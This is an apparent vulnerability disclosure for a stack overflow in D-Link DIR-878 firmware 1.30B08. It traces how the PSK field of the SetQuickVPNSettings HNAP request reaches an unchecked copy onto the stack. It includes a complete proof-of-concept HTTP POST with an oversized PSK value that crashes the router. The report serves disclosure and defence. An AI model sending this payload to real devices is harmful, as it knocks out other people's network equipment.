D-Link
DIR-878
vendor:D-Link
product:DIR-878
version:DIR_878_FW1.30B08.bin
type:Stack Overflow
author:Yifeng Li, Wolin Zhuang;
D-Link DIR-878 DIR_878_FW1.30B08.bin was discovered to contain a stack overflow via the PSK parameter in the SetQuickVPNSettings module.
In module SetQuickVPNSettings,the content obtained by the programe through /SetQuickVPNSettings/PSK is passed to v5 which is controllable for attacker and latet passed into function decrypt_aes as a parameter.
In function sub_426D74, the for loop from line 26 to line 32, first copy a1 to v7 then strtol transfer v7 to a2, which briefly, a2 equals hexdecode(a1).Let's start over again, a1, comes from a2 in function decrypt_aes, a variable is controllable to the attacker.And a2 comes from v6 in function decrypt_aes which is placed on the stack, so when we copy a1 to a2 in sub_426D74, we are basically putting v4's value into v6, which leads to a stack overflow vulnerbility .
In order to reproduce the vulnerability, the following steps can be followed:
POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1
Content-Length: 843
Accept: */*
X-Requested-With: XMLHttpRequest
HNAP_AUTH: BB3575A87B7488E75A43DB0C1C21C226 1675665912364
SOAPAction: "http://purenetworks.com/HNAP1/SetQuickVPNSettings"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36
Content-Type: text/xml; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/QuickVPN.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: uid=2cJeHZNS
Connection: close
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetQuickVPNSettings xmlns="http://purenetworks.com/HNAP1/"><Enabled>true</Enabled><Username>vpn</Username><Password>137c1abb06ef3017c74974f09be0d3fbbf7c1abb06ef3017c74949f09b70d3fbbf7c1abb06ef3017c74949f09b70d3fbbf7c1abb06ef3017c74949f09b70d3fb</Password><PSK>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</PSK><AuthProtocol>MSCHAPv2</AuthProtocol><MPPE>None</MPPE></SetQuickVPNSettings></soap:Body></soap:Envelope>
By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service.